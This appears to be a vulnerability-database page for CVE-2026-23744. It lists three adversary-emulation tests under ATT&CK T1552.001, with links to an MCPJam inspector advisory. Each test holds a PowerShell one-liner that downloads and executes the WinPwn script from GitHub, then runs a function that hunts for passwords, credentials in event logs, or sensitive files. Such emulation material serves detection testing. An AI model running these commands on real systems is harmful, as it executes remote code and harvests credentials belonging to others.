T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (3)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-23744
github.com
GitHub CVE x_refsource_CONFIRM
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
github.com
GitHub CVE x_refsource_MISC
https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a